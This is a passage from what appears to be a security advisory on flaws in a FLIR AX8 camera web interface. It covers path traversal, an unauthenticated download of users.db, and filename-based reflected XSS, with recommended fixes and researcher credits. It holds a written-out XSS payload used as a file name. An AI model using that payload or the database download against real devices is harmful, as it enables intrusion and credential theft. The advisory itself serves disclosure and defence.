The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

Tag

#sql